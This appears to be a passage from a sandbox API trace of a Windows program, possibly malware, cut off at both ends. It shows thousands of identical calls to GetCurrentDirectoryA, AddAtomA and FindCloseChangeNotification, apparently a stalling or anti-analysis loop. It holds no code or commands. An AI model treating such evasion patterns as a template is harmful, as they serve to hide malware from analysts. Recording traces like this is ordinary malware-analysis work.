GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.838] AddAtomA (lpString=0x0) returned 0x0 [0078.838] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.838] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.838] AddAtomA (lpString=0x0) returned 0x0 [0078.838] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.838] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.838] AddAtomA (lpString=0x0) returned 0x0 [0078.838] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.838] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.838] AddAtomA (lpString=0x0) returned 0x0 [0078.839] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.839] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.839] AddAtomA (lpString=0x0) returned 0x0 [0078.839] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.839] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.839] AddAtomA (lpString=0x0) returned 0x0 [0078.839] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.839] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.839] AddAtomA (lpString=0x0) returned 0x0 [0078.839] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.839] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.839] AddAtomA (lpString=0x0) returned 0x0 [0078.839] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.840] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.840] AddAtomA (lpString=0x0) returned 0x0 [0078.840] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.840] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.840] AddAtomA (lpString=0x0) returned 0x0 [0078.840] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.840] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.840] AddAtomA (lpString=0x0) returned 0x0 [0078.840] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.840] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.840] AddAtomA (lpString=0x0) returned 0x0 [0078.841] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.841] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.841] AddAtomA (lpString=0x0) returned 0x0 [0078.841] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.841] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.841] AddAtomA (lpString=0x0) returned 0x0 [0078.841] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.841] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.841] AddAtomA (lpString=0x0) returned 0x0 [0078.841] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.841] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.841] AddAtomA (lpString=0x0) returned 0x0 [0078.841] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.842] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.842] AddAtomA (lpString=0x0) returned 0x0 [0078.842] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.842] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.842] AddAtomA (lpString=0x0) returned 0x0 [0078.842] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.842] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.842] AddAtomA (lpString=0x0) returned 0x0 [0078.842] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.842] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.842] AddAtomA (lpString=0x0) returned 0x0 [0078.842] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.842] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.842] AddAtomA (lpString=0x0) returned 0x0 [0078.842] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.843] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.843] AddAtomA (lpString=0x0) returned 0x0 [0078.843] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.843] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.843] AddAtomA (lpString=0x0) returned 0x0 [0078.843] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.843] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.843] AddAtomA (lpString=0x0) returned 0x0 [0078.843] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.843] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.843] AddAtomA (lpString=0x0) returned 0x0 [0078.843] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.843] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.843] AddAtomA (lpString=0x0) returned 0x0 [0078.843] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.843] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.843] AddAtomA (lpString=0x0) returned 0x0 [0078.843] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.844] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.844] AddAtomA (lpString=0x0) returned 0x0 [0078.844] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.844] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.844] AddAtomA (lpString=0x0) returned 0x0 [0078.844] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.844] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.844] AddAtomA (lpString=0x0) returned 0x0 [0078.844] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.844] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.844] AddAtomA (lpString=0x0) returned 0x0 [0078.844] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.844] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.844] AddAtomA (lpString=0x0) returned 0x0 [0078.844] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.844] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.844] AddAtomA (lpString=0x0) returned 0x0 [0078.844] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.845] AddAtomA (lpString=0x0) returned 0x0 [0078.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.845] AddAtomA (lpString=0x0) returned 0x0 [0078.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.845] AddAtomA (lpString=0x0) returned 0x0 [0078.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.845] AddAtomA (lpString=0x0) returned 0x0 [0078.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.845] AddAtomA (lpString=0x0) returned 0x0 [0078.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.845] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.845] AddAtomA (lpString=0x0) returned 0x0 [0078.845] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.846] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.846] AddAtomA (lpString=0x0) returned 0x0 [0078.846] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.846] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.846] AddAtomA (lpString=0x0) returned 0x0 [0078.846] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.846] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.846] AddAtomA (lpString=0x0) returned 0x0 [0078.846] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.846] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.846] AddAtomA (lpString=0x0) returned 0x0 [0078.846] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.846] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.846] AddAtomA (lpString=0x0) returned 0x0 [0078.940] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.957] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.957] AddAtomA (lpString=0x0) returned 0x0 [0078.957] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.957] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.957] AddAtomA (lpString=0x0) returned 0x0 [0078.957] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.957] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.957] AddAtomA (lpString=0x0) returned 0x0 [0078.957] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.957] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.958] AddAtomA (lpString=0x0) returned 0x0 [0078.958] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.958] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.958] AddAtomA (lpString=0x0) returned 0x0 [0078.958] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.958] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.958] AddAtomA (lpString=0x0) returned 0x0 [0078.958] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.958] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.958] AddAtomA (lpString=0x0) returned 0x0 [0078.958] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.958] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.958] AddAtomA (lpString=0x0) returned 0x0 [0078.958] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.958] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.958] AddAtomA (lpString=0x0) returned 0x0 [0078.958] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.959] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.959] AddAtomA (lpString=0x0) returned 0x0 [0078.959] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.959] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.959] AddAtomA (lpString=0x0) returned 0x0 [0078.959] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.959] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.959] AddAtomA (lpString=0x0) returned 0x0 [0078.959] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.959] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.959] AddAtomA (lpString=0x0) returned 0x0 [0078.959] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.959] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.959] AddAtomA (lpString=0x0) returned 0x0 [0078.959] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.959] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.959] AddAtomA (lpString=0x0) returned 0x0 [0078.959] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.960] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.960] AddAtomA (lpString=0x0) returned 0x0 [0078.960] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.960] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.960] AddAtomA (lpString=0x0) returned 0x0 [0078.960] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.960] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.960] AddAtomA (lpString=0x0) returned 0x0 [0078.960] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.960] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.960] AddAtomA (lpString=0x0) returned 0x0 [0078.960] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.960] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.960] AddAtomA (lpString=0x0) returned 0x0 [0078.960] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.960] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.960] AddAtomA (lpString=0x0) returned 0x0 [0078.960] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.960] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.960] AddAtomA (lpString=0x0) returned 0x0 [0078.960] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.960] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.960] AddAtomA (lpString=0x0) returned 0x0 [0078.960] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.961] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.961] AddAtomA (lpString=0x0) returned 0x0 [0078.961] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.961] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.961] AddAtomA (lpString=0x0) returned 0x0 [0078.961] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.961] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.961] AddAtomA (lpString=0x0) returned 0x0 [0078.961] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.961] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.961] AddAtomA (lpString=0x0) returned 0x0 [0078.961] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.961] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.961] AddAtomA (lpString=0x0) returned 0x0 [0078.961] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.961] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.961] AddAtomA (lpString=0x0) returned 0x0 [0078.961] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.961] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.961] AddAtomA (lpString=0x0) returned 0x0 [0078.961] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.961] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.961] AddAtomA (lpString=0x0) returned 0x0 [0078.961] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.961] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.962] AddAtomA (lpString=0x0) returned 0x0 [0078.962] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.962] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.962] AddAtomA (lpString=0x0) returned 0x0 [0078.962] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.962] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.962] AddAtomA (lpString=0x0) returned 0x0 [0078.962] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.962] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.962] AddAtomA (lpString=0x0) returned 0x0 [0078.962] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.962] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.962] AddAtomA (lpString=0x0) returned 0x0 [0078.962] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.962] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.962] AddAtomA (lpString=0x0) returned 0x0 [0078.962] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.962] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.962] AddAtomA (lpString=0x0) returned 0x0 [0078.962] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.962] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.963] AddAtomA (lpString=0x0) returned 0x0 [0078.963] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.963] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.963] AddAtomA (lpString=0x0) returned 0x0 [0078.963] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.963] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.963] AddAtomA (lpString=0x0) returned 0x0 [0078.963] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.963] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.963] AddAtomA (lpString=0x0) returned 0x0 [0078.963] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.963] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.963] AddAtomA (lpString=0x0) returned 0x0 [0078.963] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.963] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.963] AddAtomA (lpString=0x0) returned 0x0 [0078.963] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.963] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.963] AddAtomA (lpString=0x0) returned 0x0 [0078.963] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.963] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.963] AddAtomA (lpString=0x0) returned 0x0 [0078.964] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.964] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.964] AddAtomA (lpString=0x0) returned 0x0 [0078.964] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.964] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.964] AddAtomA (lpString=0x0) returned 0x0 [0078.964] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.964] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.964] AddAtomA (lpString=0x0) returned 0x0 [0078.964] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.964] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.964] AddAtomA (lpString=0x0) returned 0x0 [0078.964] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.964] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.964] AddAtomA (lpString=0x0) returned 0x0 [0078.964] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.964] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.964] AddAtomA (lpString=0x0) returned 0x0 [0078.965] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.965] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.965] AddAtomA (lpString=0x0) returned 0x0 [0078.965] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.965] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.965] AddAtomA (lpString=0x0) returned 0x0 [0078.965] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.965] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.965] AddAtomA (lpString=0x0) returned 0x0 [0078.965] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.965] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.965] AddAtomA (lpString=0x0) returned 0x0 [0078.965] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.965] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.965] AddAtomA (lpString=0x0) returned 0x0 [0078.965] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.965] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.965] AddAtomA (lpString=0x0) returned 0x0 [0078.965] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.965] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.965] AddAtomA (lpString=0x0) returned 0x0 [0078.965] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.966] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.966] AddAtomA (lpString=0x0) returned 0x0 [0078.966] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.966] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.966] AddAtomA (lpString=0x0) returned 0x0 [0078.966] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.966] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.966] AddAtomA (lpString=0x0) returned 0x0 [0078.966] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.966] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.966] AddAtomA (lpString=0x0) returned 0x0 [0078.966] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.966] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.966] AddAtomA (lpString=0x0) returned 0x0 [0078.966] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.966] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.966] AddAtomA (lpString=0x0) returned 0x0 [0078.966] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.966] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.966] AddAtomA (lpString=0x0) returned 0x0 [0078.967] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.967] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.967] AddAtomA (lpString=0x0) returned 0x0 [0078.967] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.967] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.967] AddAtomA (lpString=0x0) returned 0x0 [0078.967] FindCloseChangeNotification (hChangeHandle=0x0) returned 